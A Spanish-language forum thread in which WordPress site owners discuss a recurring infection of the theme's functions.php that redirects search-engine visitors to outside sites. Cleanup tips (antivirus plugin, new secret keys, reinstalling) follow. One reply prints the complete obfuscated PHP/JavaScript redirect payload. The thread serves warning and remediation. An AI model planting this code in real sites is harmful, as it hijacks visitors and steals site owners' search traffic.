Protege tu sitio WordPress: cómo eliminar virus que causa perdida de visitas

  • Autor Autor lennuc
  • Fecha de inicio Fecha de inicio
L

lennuc

Préstamo
Ni
Redactor
Hola después de tener un brusco descenso en las visitas hace casi 1 mes... pensé que me había afectado la actualización de google, pero ayer por error buscando una key me confundí y abrí google de españa que el google de argentina.

Cuando ingrese mis key y entre desde google de españa (los otros google andaba bien, salvo una key en mexico) me mando a mi sitio pero automaticamente (rapido) me redirecciono a Googosearch.biz y posteriormente a una tienda de ropa en ingles.

Dicha infección se puede localizar en el archivo fuctions.php del theme que se tenga activado pero cuando se ingresa a ver el código fuente común como se haría para mirar alguna codificación de algún sitio no se ve nada extraño pero dicho virus es un php con script que se conecta con el footer (lamentablemente no me di cuenta de copiar el código para compartir el mismo antes de borrarlo).

Cabe destacar que dicha infección la quite anoche y hoy por la tarde nuevamente estaba infectado ya que soy de tener una ventana abierta para controlar las visitas online.

Por lo que ley en el código del virus no solo afecta algunas keys en google, sino que también yahoo, bing entre otros.

Si se ingresa al post "x" y se mira el código fuente no se nota nada extraño ya que todo anda bien, el problema es cuando se ingresa de algún buscador con "x" palabra.

Que problema trae esta infección?: Perdida de visitas, yo anoche retire dicha infección y ya he recuperado casi el 30% de visitas que perdí pensando que era el panda y obviamente con dicha perdida de visitas las ganancias son menores.

Espero les sirva para que controlen sus theme, aun no se como bloquear la infección ya que anoche la retire como indique pero hace unos minutos entre y de nuevo estaba infectado y no soy el único, ya que otro usuario por msn me comento lo mismo y un usuario del foro le paso lo mismo y todos tenemos plantillas diferentes.

Código de virus:

?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "
Hacer clic para expandir...

No esta completo ya que después sigue un script largo donde se ven los nombres de msn, yahoo, google, bing, altavista, ask entre otros.

Aquí encontré algo: http://wordpress.org/support/topic/cant-get-rid-of-a-redirecting-trojan

Saludos :encouragement:
 
Última edición:
Muchas gracias por el aviso, habrá que pegar una revisión por si acaso 🙂
 
A mi no hace mucho me sucedió también algo parecido, pero por .htacces, que redireccionaba todas las visitas provenientes de los motores de busqueda a un buscador en ingles.
 
De nuevo revise el .htacces y no encontré nada raro, por eso es extraño.
 
no comprendo, de que forma pudo haber entrado ese virus? en una actualizacion de wordpress?
 
seria bueno que publiques todo el codigo, para entenderlo, se puede reutilizar para bien ese troyano
 
Hay varios virus de script que saben infectar el index, header o el footer pero esta vez esta en el fuctions.php

El código es el mismo que WordPress › Support » Can't get rid of a redirecting trojan

Insertar CODE, HTML o PHP: 
?><?php
add_action('get_footer', 'add_sscounter');
	function add_sscounter(){
		echo '<!--scounter-->';
		if(function_exists('is_user_logged_in')){
			if(time()%2 == 0 && !is_user_logged_in()){
				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
			}
		}
	}
?>
 
gracias por el dato, a revisar entonces.
 
Gracias por el aviso y que bueno que ya lo eliminaste 🙂
 
buena info che... De hecho revisaré en 2 sitios mios que siguen en casi las mismas posiciones pero con 1/4 visitas desde un dia para el otro, ojala sea algo de eso que me haya estado cagando un tiempo 😛
 
Yo me lo tragué durante un tiempo, me pasó exactamente como dices, pero lo eliminé del codigo y todo volvió a la normalidad .
 
Anoche borre el código pero hoy a la tarde estaba nuevamente infectado. Así que no se como bloquear, ahora estoy borrando plugins desactivados y themes subidos que no uso.

Espero que no se infecte de nuevo, sino aviso por aquí de nuevo.
 
Una duda... nuevamente te aparece el código en el functions.php?
 
A mi me paso algo similar, solo cambie de theme y listo :encouragement:
 
Carlos Arreola dijo:
Una duda... nuevamente te aparece el código en el functions.php?
Hacer clic para expandir...

Si Carlos, lo borre anoche como comente y hoy por la tarde después de casi 18 horas de borrarlo volvió a aparecer, ahora controle de nuevo y esta todo en orden pero mañana tendré que seguir revisando.
 
Instala el plugin antivirus, lo pasas y te saldrá todo el código malicioso que tengas, lo borras y listo (así hice yo) . Acuérdate de desinstalar luego el plugin por que te deja el Server lento.
 
lennuc dijo:
Anoche borre el código pero hoy a la tarde estaba nuevamente infectado. Así que no se como bloquear, ahora estoy borrando plugins desactivados y themes subidos que no uso.

Espero que no se infecte de nuevo, sino aviso por aquí de nuevo.
Hacer clic para expandir...

- ¿Has instalado temas o plugins de dudosa procedencia?
- ¿Alguien que te haya hecho alguna modificación contratada?
- ¿Tienes abiertos los comentarios?

Pregunto para prevenirme.
-
 
Ah ya veo, yo tuve el mismo problema pero no me volvió a aparecer el código en el functions, entonces si debes tener algún archivo que te esté re-infectando. Deberías revisar tus plugins y reinstalar wordpress.
 
Cambia las secret keys de tu wp-config.php a ver si estuviesen entrando por ahí

Change your secret keys.
If they stole your password and are logged in to your blog, even if you change your password they will remain logged in. How? because their cookies are still valid. To disable them, you have to create a new set of secret keys. Visit the WordPress key generator to obtain a new random set of keys, then overwrite the values in your wp-config.php file with the new ones.
Hacer clic para expandir...

Aquí te dan mucha más información sobre cómo proceder:

FAQ My site was hacked « WordPress Codex

Ya nos cuentas, suerte!
 
Ha caray, mas vale revisar porque curiosamente he perdido algo de visitas, gracias por la información compañero, ahorita mismo le doy una revisada
 
Hay que estar conectado o registrado para responder aquí.
Atrás
Arriba